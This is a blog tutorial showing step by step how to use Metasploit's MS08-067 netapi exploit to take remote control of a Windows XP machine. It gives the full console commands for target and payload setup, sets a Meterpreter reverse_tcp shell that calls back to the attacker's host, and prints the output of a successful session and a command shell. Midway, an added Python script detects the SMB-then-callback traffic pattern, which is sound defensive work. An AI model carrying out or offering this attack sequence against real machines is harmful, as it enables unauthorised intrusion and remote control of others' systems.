There are several posts and videos showing this procedure, but since we have received several questions about this topic we’ll show you how to use Metasploit to take remote control of a Windows XP / 2003 machine.
In this post we’ll take advantage of the MS08-067 vulnerability, a flaw in the Windows Server service (netapi) reachable over the SMB protocol that allows arbitrary code execution. For this we’ll use two machines: one running Metasploit (this can be Windows or Linux) and a Windows XP victim (this can also be a Windows 2003).
To get started, first open the Metasploit console with the msfconsole command.
Now, let’s select our vulnerability with the following command:
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) >
Now that the prompt reflects the name of the vulnerability, let’s execute the following command to see how it should be configured:
msf exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST                     yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use

Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting

The first option, RHOST, is the name or IP address of the Windows XP victim we want to attack. RPORT and SMBPIPE are mandatory options that indicate the port the exploit is sent to and the named pipe to use. There’s no need to modify these last two values.
To configure the IP of the XP victim, let’s execute the following command:
msf exploit(ms08_067_netapi) > set RHOST 192.168.75.90
RHOST => 192.168.75.90

where 192.168.75.90 is the actual IP of the victim.
The “Exploit target” section indicates which platforms this exploit can target. If we execute the following command we’ll see all platforms vulnerable to this exploit:

msf exploit(ms08_067_netapi) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Automatic Targeting
   1   Windows 2000 Universal
   2   Windows XP SP0/SP1 Universal
   3   Windows XP SP2 English (AlwaysOn NX)

From the listing above we can see that the current value of “0” means Metasploit will identify the victim’s platform automatically; this option is enough and there’s no need to modify it. If you wish, you can change this value to define your target manually with the following command:

msf exploit(ms08_067_netapi) > set target 1
target => 1
Now we have to configure the payload used by our exploit; this tells Metasploit what to do once the exploit has been successfully executed on the victim’s machine. We set it with the following option:

msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp

The “reverse_tcp” payload runs a reverse client on the XP machine which connects back to our Metasploit machine, by default on port 4444. This payload is the one that will allow us to take control of the XP victim. Now, to tell the victim where to connect back to, we have to set the following option:

msf exploit(ms08_067_netapi) > set LHOST 192.168.75.35
LHOST => 192.168.75.35
where 192.168.75.35 is the IP address of your own Metasploit machine.
With all these steps we are now ready to execute the attack. If we execute the “show options” command we’ll see the final configuration of our exploit:
msf exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    192.168.75.90    yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread, process, none
   LHOST     192.168.75.35    yes       The listen address
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting
If everything is ok, we launch the attack by executing the “exploit” command and just wait for the exploit to complete:
msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 192.168.75.35:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 2 - lang:Spanish
[*] Selected Target: Windows XP SP2 Spanish (NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (752128 bytes) to 192.168.75.90
[*] Meterpreter session 1 opened (192.168.75.35:4444 -> 192.168.75.90:1049) at 2013-04-08 18:53:58 -0500

meterpreter >

The “meterpreter >” prompt indicates that we are now ready to control the XP machine. To confirm that we are indeed inside this machine, let’s execute the “sysinfo” command:

meterpreter > sysinfo
Computer        : TMWINXP01
OS              : Windows XP (Build 2600, Service Pack 2).
Architecture    : x86
System Language : es_MX
Meterpreter     : x86/win32
Now we can also execute the “shell” command to obtain a prompt from within the victim’s machine and start to execute operations:
meterpreter > shell
Process 1652 created.
Channel 1 created.
Microsoft Windows XP [Versión 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>
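A defender-side addition to this post (example code, not from the original): the successful run above leaves a distinctive trace in connection logs, an inbound SMB connection to port 445 followed a couple of seconds later by the victim (192.168.75.90) connecting back to the very same peer on port 4444 and receiving a 752128-byte stage. The script below correlates that pattern over constructed flow-log lines; the log format, the 30-second window and the 100,000-byte threshold are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample flow log (not from the original post).
# Format: "timestamp src:port -> dst:port proto bytes"
SAMPLE_LOG = """\
2013-04-08 18:53:55 192.168.75.35:50102 -> 192.168.75.90:445 tcp 4120
2013-04-08 18:53:57 192.168.75.90:1049 -> 192.168.75.35:4444 tcp 752128
2013-04-08 18:55:10 192.168.75.20:49321 -> 192.168.75.90:445 tcp 1800
2013-04-08 18:55:12 192.168.75.90:1050 -> 192.168.75.20:80 tcp 4000
"""

LINE_RE = re.compile(
    r"^(\S+ \S+) (\d+\.\d+\.\d+\.\d+):(\d+) -> (\d+\.\d+\.\d+\.\d+):(\d+) \w+ (\d+)$"
)
SMB_PORT = 445
WINDOW = timedelta(seconds=30)     # assumed: how soon after the SMB hit a callback counts
MIN_STAGE_BYTES = 100_000          # assumed: a Meterpreter stage is far larger than this


def parse(log):
    """Yield one dict per well-formed log line; malformed lines are skipped."""
    for line in log.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts, src, sport, dst, dport, nbytes = m.groups()
        yield {"ts": datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"),
               "src": src, "sport": int(sport), "dst": dst,
               "dport": int(dport), "bytes": int(nbytes)}


def find_reverse_callbacks(log, window=WINDOW, min_bytes=MIN_STAGE_BYTES):
    """Return (victim, peer, callback_port) for every host that accepted an inbound
    SMB connection from some peer and, within `window`, opened a new outbound
    connection back to that same peer carrying at least `min_bytes`."""
    events = sorted(parse(log), key=lambda e: e["ts"])
    smb_inbound = defaultdict(list)    # (smb_server, client) -> [timestamps]
    alerts = []
    for e in events:
        if e["dport"] == SMB_PORT:
            smb_inbound[(e["dst"], e["src"])].append(e["ts"])
            continue
        # Outbound flow: was there a recent inbound SMB hit from this destination?
        recent = [t for t in smb_inbound.get((e["src"], e["dst"]), [])
                  if e["ts"] - t <= window]
        if recent and e["bytes"] >= min_bytes:
            alerts.append((e["src"], e["dst"], e["dport"]))
    return alerts
```

The byte threshold keeps ordinary client traffic from the same server (the web request in the fourth sample line) out of the alert list; lowering it trades precision for coverage of smaller payloads.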
And there you go! We are now controlling the victim’s machine. In some situations you may not receive the expected meterpreter session but something similar to the following lines instead. In those cases you may assume the port we are trying to reach is closed or the attack is being detected by an IPS.

msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 192.168.75.35:4444
[-] Exploit failed [unreachable]: Rex::ConnectionTimeout The connection timed out (192.168.75.90:445).

The most probable reason for this is the presence of a firewall, either an external one or the Windows firewall; in this case the exploit cannot be executed. If you want to verify that the port is closed you can run the following command from Metasploit:

msf exploit(ms08_067_netapi) > nmap 192.168.75.90
[*] exec: nmap 192.168.75.90

Starting Nmap 6.25 ( http://nmap.org ) at 2013-04-08 19:18 CDT
Nmap scan report for 192.168.75.90
Host is up (0.00019s latency).
All 1000 scanned ports on 192.168.75.90 are filtered
MAC Address: 00:0C:29:4E:E1:93 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 34.51 seconds

This result confirms the victim is behind a firewall. In this case we would have to use another vulnerability / exploit to take remote control of the victim.
Remember to send us your questions and comments to our Twitter account: @redinskala where you will find more information and security tips.
Thanks for your visit!